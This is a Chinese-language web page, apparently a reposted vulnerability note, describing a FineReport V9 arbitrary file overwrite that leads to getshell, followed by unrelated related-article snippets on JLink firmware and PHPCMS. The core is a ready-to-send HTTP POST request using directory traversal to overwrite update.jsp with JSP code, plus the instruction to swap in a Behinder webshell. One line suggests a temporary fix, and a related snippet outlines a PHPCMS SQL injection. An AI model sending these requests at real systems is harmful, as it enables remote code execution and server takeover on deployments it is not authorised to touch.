帆软 V9 Getshell 漏洞

news/2024/11/25 17:21:03/

0x00 任意文件上传漏洞【FineReport V9

 

0x01 漏洞描述

此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件

0x02 漏洞详情

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8Content-Length: 74{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}

 

 payload 替换成冰蝎的马,即可getshell

0x03  临时修复建议

排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。

 


http://www.ppmy.cn/news/353559.html

相关文章

JLink v9 固件修复

文件下载地址&#xff08;引用wyd的文件&#xff09;&#xff1a; https://gitee.com/wyd66666666/jlinkv9-repair接线 需要将坏的JLink拆开&#xff0c;用线将好的JLink和坏的JLink连起来 VTref -- VTref SWDIO -- TMS SWCLK -- TCK GND -- GND烧录方法 (1) 烧录一个…

工具 JLINK V9 自制

自制JLINK V9 测试可以使用 只是不能更新 感谢网友的分享~&#xff01;具体的网址没有保存。在此基础上才能弄出自制的JLINKV9 原理图&#xff0c;PCB效果、材料清单如下&#xff1a;

php v9发布顺序,PHPCMS V9搜索按发布时间或ID排序显示的实现方法

这篇文章主要为大家详细介绍了PHPCMS V9搜索按发布时间或ID排序显示的实现方法&#xff0c;具有一定的参考价值&#xff0c;感兴趣的小伙伴们可以参考一下,有需要的朋友可以收藏方便以后借鉴。 上一个关于phpcms&#xff0c;361源码给大家介绍了《phpcms v9搜索显示页第一页多出…

phpcms set inc.php,phpcms V9 sql注入漏洞测试

phpcms V9 版本存在SQL注入漏洞,漏洞复现如下 0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值: http://127.0.0.1/index.php?m=wap&c=index&a=init&siteid=1 0x01 构造SQL语句,将0x00中的mvbpqw_siteid值代入下面链接,以POST方式发起请求 0x02 将0x…

php v9验证码错误,phpcms v9 后台登陆地址 验证码错误等常见问题

PHPCMS v9网站更换域名怎么办&#xff1f; 网站在发展的过程中&#xff0c;很可能多次的修改域名。那么在PHPCMS V9中我们要怎么进行设置呢&#xff1f; 请进行以下步骤的修改&#xff1a;修改/caches/configs/system.php里面所有和域名有关的&#xff0c;把以前的老域名修改为…

php v9 邮件发送,phpcms V9表单向导之发送邮箱配置及邮件接收提醒内容设置攻略...

我们在使用phpcms V9表单向导接收用户提交信息时&#xff0c;phpcms默认的邮件提醒不包含用户数据&#xff0c;我们还有到后台查看&#xff0c;有点麻烦。今天就说下phpcms表单向导如何在后台配置发送邮箱和把详细内容发到指定邮箱。 发送邮箱配置 后台-设置-邮箱配置&#xff…

6108v9c卡刷包_wc6108v9c线刷包_wc6108v9c刷机包_wc6108v9c固件包_wc6108v9c救砖包 - 线刷宝ROM中心...

线刷宝用户协议 本协议是用户 (自然人、法人或社会团体)与杭州登先网络科技有限公司(以下简称"登先网络")之间关于"线刷宝"软件产品(以下简称"本软件产品")的法律协议。一旦安装、复制或以其他方式使用本软件产品,即表示同意接受协议各项条件的…

《嵌入式 - 工具》JLink V9固件更新方法

开发环境&#xff1a; Keil&#xff1a;V5.30 J-link&#xff1a;V9.4 J-Link拥有多种型号如J-Link BASE、J-Link PLUS、J-Link ULTRA、J-Link PRO等。我们常说的是J-Link V8、V9、V10版&#xff0c;指的是J-Link BASE的硬件版本。如何查看目前使用的J-Link是哪个型号及硬件版…